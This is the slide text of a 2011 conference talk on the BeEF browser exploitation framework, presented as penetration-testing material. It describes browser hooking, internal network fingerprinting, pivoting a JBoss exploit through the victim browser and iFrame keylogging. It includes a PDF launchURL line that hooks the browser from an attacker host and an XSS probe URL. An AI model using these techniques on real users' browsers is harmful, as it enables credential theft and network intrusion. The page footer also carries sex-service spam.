SlideShare a Scribd company logo

Be ef presentation-securitybyte2011-michele_orru

Michele Orru
Michele Orru

Outline: What the hell is BeEF? ✴Cutting Target enumeration and analysis ✴Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴Future development and ideas

Technology
1 of 32
Download to read offline
Ground BeEF: Cutting, devouring and digesting the legs off a browser Michele „antisnatchor” Orru’ 6 September 2011
Who am I? ✴ Penetration Tester @ The Royal Bank of Scotland ✴ BeEF developer: Tunneling Proxy, XssRays integration, various exploits, lot of bug-fixing, testing and fun ✴ Kubrick fan ✴ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ✴@antisnatchor ✴http://antisnatchor.com
Outline ✴ What the hell is BeEF? ✴Cutting Target enumeration and analysis ✴Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴Future development and ideas
What the hell is BeEF? ✴ BeEF: Browser Exploitation Framework ✴Pioneered by Wade Alcorn in 2005 (public release) ✴Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ✴Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ✴ The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
What the hell is BeEF?
Cutting: Target enum and analysis ✴ Lot of juicy information after first hook initialization : ✴Browser/OS version ✴Cookies ✴Browser plugins ✴Supported features (Google Gears, Web Sockets, Flash, Java, . .) ✴Specific modules are also there to help ✴Detect links/visited URLs ✴Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ✴Execute your custom Javascript
Cutting: Target enum and analysis
Devouring: Internal net fingerprint Recon/NetworkFingerprinting module ✴Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. ✴The approach currently in use is similar to Yokoso (InGuardians) ✴Map of device/application default images ✴img tags are loaded into the victim DOM ✴Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found ✴Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... ” on Vimeo (http://vimeo.com/24410203) for a practical example
Devouring: Internal net fingerprint ✴ Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ✴ They developed new BeEF modules ✴They are working with us and their work will be available in BeEF trunk soon. A few examples: ✴Internal DNS enumeration ✴Reliable Port Scanning ✴Ping sweep
Devouring: exploiting internal services ✴Network/JbossJmxUploadExploit module ✴JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) ✴Then why not use the victim browser as a pivot?
Devouring: persistent keylogging Persistence/iFrameKeylogger module ✴We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ✴After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
Devouring: module autorun ✴ We’ve ported back (from the old PHP version) the autorun feature ✴Add autorun: true in the command module config.yaml that you want to autorun ✴When a new browser will be hooked in BeEF, the module will be automatically launched ✴Imagine adding autorun: true in Metasploit autopwn module (another feature ported back)...
Digesting: hook default browser ✴Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface” Browser/HookDefault module ✴We use a PDF in order to attempt hooking the default browser ✴When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ✴app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true); ✴If everything will be ok, we hooked the default browser. ✴We are planning to improve it: ✴make the bounce page configurable by the user ✴use a ruby PDF library in order to manipulate the PDF via the web UI
Digesting: tunneling proxy ✴Having a communication channel with the hooked browser, we can: ✴Receive requests as a proxy on BeEF ✴Translate these requests to XHRs (in-domain) ✴Parse the XHRs responses and send the data back to the original requestor... ✴Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ✴browsing the authenticated surface of the hooked domain through the security context of the victim browser; ✴spidering the hooked domain through the security context of the victim browser; ✴finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
Digesting: tunneling proxy Let see the tunneling proxy in action!
Digesting: XssRays ✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ✴What XssRays do is basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path. ✴The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ✴This is now patched by all recent browsers. So how to check for XSSs cross-domain, respecting the SOP restrictions?
Digesting: XssRays ✴We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). ✴No false positives (oh yes, that’s what I like)! ✴Basically the document.location.href of the injected iFrame that contains the vector will point to a know BeEF resource. The following is an example value of href: ✴http://192.168.84.1:3000/ui/xssrays/rays? hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk 9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name= %22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection %20double&method=GET ✴Next step is multihooking: hook a browser on multiple domains, to extend the attack surface.
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Future dev and ideas ✴Improve XssRays: ✴add more attack vectors, more testing ✴add JS depth crawler ✴Multi-hooking: a browser can be hooked on multiple domains ✴Check for time-based blind SQLi cross-domain via JS ✴Improve the BeEF console (command line UI) ✴Well...take a look here: http://code.google.com/p/beef/issues/list
Get in touch with us ✴Follow the BeEF: @beefproject ✴Checkout BeEF: http://code.google.com/p/beef/ ✴Check our website: http://beefproject.com ✴Have fun with it ✴We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)
Thanks to ✴Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ✴My colleagues Piotr & Michal ✴My employer ✴SecurityByte crew and you attendees
Questions? Thanks for your time guys ;-)

Recommended

Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 

Recommended

Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPressdsero
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersSaumil Shah
 
Php push notifications
Php push notificationsPhp push notifications
Php push notificationsMohammed Shurrab
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFMichele Orru
 
BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Frameworkawiasecretary
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's EncryptWalter Ebert
 
Http only cookie
Http only cookieHttp only cookie
Http only cookiefool2fish
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuJan Voracek
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and moreYan Shi
 

More Related Content

What's hot

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPressdsero
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersSaumil Shah
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFMichele Orru
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Frameworkawiasecretary
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's EncryptWalter Ebert
 
Http only cookie
Http only cookieHttp only cookie
Http only cookiefool2fish
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuJan Voracek
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 

What's hot (20)

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
 
Php push notifications
Php push notificationsPhp push notifications
Php push notifications
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEF
 
BeEF
BeEFBeEF
BeEF
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Framework
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorial
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's Encrypt
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressu
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 

Similar to Be ef presentation-securitybyte2011-michele_orru

(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and moreYan Shi
 
Web app and more
Web app and moreWeb app and more
Web app and morefaming su
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...Building Blocks
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror StoriesEC-Council
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Christian Frichot
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsChema Alonso
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Frédéric Harper
 
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28Frédéric Harper
 
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27Frédéric Harper
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security ClassRich Helton
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guideSudhanshu Chauhan
 
Bruce lawson-over-the-air
Bruce lawson-over-the-airBruce lawson-over-the-air
Bruce lawson-over-the-airbrucelawson
 
JSConf US 2014: Building Isomorphic Apps
JSConf US 2014: Building Isomorphic AppsJSConf US 2014: Building Isomorphic Apps
JSConf US 2014: Building Isomorphic AppsSpike Brehm
 
WebAPIs & Apps - Mozilla London
WebAPIs & Apps - Mozilla LondonWebAPIs & Apps - Mozilla London
WebAPIs & Apps - Mozilla LondonRobert Nyman
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 

Similar to Be ef presentation-securitybyte2011-michele_orru (20)

(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and more
 
Web app and more
Web app and moreWeb app and more
Web app and more
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnets
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
 
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
 
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guide
 
Sanjeev ghai 12
Sanjeev ghai 12Sanjeev ghai 12
Sanjeev ghai 12
 
Bruce lawson-over-the-air
Bruce lawson-over-the-airBruce lawson-over-the-air
Bruce lawson-over-the-air
 
JSConf US 2014: Building Isomorphic Apps
JSConf US 2014: Building Isomorphic AppsJSConf US 2014: Building Isomorphic Apps
JSConf US 2014: Building Isomorphic Apps
 
WebAPIs & Apps - Mozilla London
WebAPIs & Apps - Mozilla LondonWebAPIs & Apps - Mozilla London
WebAPIs & Apps - Mozilla London
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 

More from Michele Orru

Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XMichele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a PhishermanMichele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruMichele Orru
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFMichele Orru
 

More from Michele Orru (7)

Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a Phisherman
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
 

Recently uploaded

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
